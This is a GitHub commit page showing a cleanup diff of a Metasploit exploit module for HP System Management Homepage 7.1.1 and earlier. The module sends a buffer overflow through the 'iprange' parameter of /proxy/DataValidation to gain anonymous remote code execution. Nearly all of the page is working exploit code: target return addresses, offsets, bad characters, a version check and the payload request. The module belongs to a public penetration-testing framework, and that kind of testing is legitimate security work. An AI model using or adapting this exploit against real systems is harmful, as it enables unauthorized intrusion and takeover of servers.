Skip to content

Commit

Permalink
cleanup for hp_system_management
Browse files Browse the repository at this point in the history
  • Loading branch information
jvazquez-r7 committed Mar 29, 2013
1 parent 139926a commit c55a387
Showing 1 changed file with 59 additions and 26 deletions.
85 changes: 59 additions & 26 deletions modules/exploits/linux/http/hp_system_management.rb
Original file line number Diff line number Diff line change
Expand Up @@ -8,64 +8,97 @@
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
Rank = NormalRanking

HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] }

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'HP System Management Anonymous Access Code Execution',
'Description' => %q{
This module exploits an anonymous remote code execution on hp system management 7.1.1 and inferior.
This module exploits an anonymous remote code execution on HP System Management
7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on
a request against /proxy/DataValidation. In order to work HP System Management must
be configured with Anonymous access enabled.
},
'Author' => [ 'agix - @agixid' ],
'Author' => [ 'agix' ], # @agixid
'License' => MSF_LICENSE,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1000,
'BadChars' => "\x00\x25\x0a\x0b\x0d\x3a\x3b\x09\x0c\x23\x20",
'EncoderOptions' =>
{
'BufferRegister' => 'ESP' # See the comments below
}
},
'Platform' => ['linux'],
'Arch' => ARCH_X86,
'References' =>
[
['URL', 'http://bit.ly/YhjikT']
]
'Targets' => [

#['URL', 'http://bit.ly/YhjikT'],
#['OSVDB', 'http://bit.ly/YhjikT']
],
'Targets' =>
[
[ 'HP System Management 7.1.1 - Linux (CentOS)',
{
'Ret' => 0x8054e14, # push esp / ret
'Offset' => 267
}
{
'Ret' => 0x8054e14, # push esp / ret
'Offset' => 267
}
],
[ 'HP System Management 6.3.0 - Linux (CentOS)',
{
'Ret' => 0x805a547, # push esp / ret
'Offset' => 267
}
{
'Ret' => 0x805a547, # push esp / ret
'Offset' => 267
}
]

],
'DisclosureDate' => 'Sep 01 2012',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(2381),
OptBool.new('SSL', [true, 'Use SSL', true])
], self.class)

end

def check
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cpqlogin.htm"
})

if res and res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/
version = $1
return Exploit::CheckCode::Vulnerable if version <= "7.1.1.1"
end

return Exploit::CheckCode::Safe
end

def exploit
padding = rand_text(target['Offset'])

padding = rand_text_alpha(target['Offset'])
ret = [target['Ret']].pack('V')
uri = "/proxy/DataValidation"
iprange = "a-bz"+padding+ret+payload.encoded
print_status("Sending #{uri.length} bytes payload...")

print_status("#{rhost}:#{rport} - Sending exploit...")

res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' => {
'iprange' => iprange
}
})
handler
'method' => 'GET',
'uri' => "/proxy/DataValidation",
'encode_params' => false,
'vars_get' => {
'iprange' => iprange
}
})

end

end

0 comments on commit c55a387

Please sign in to comment.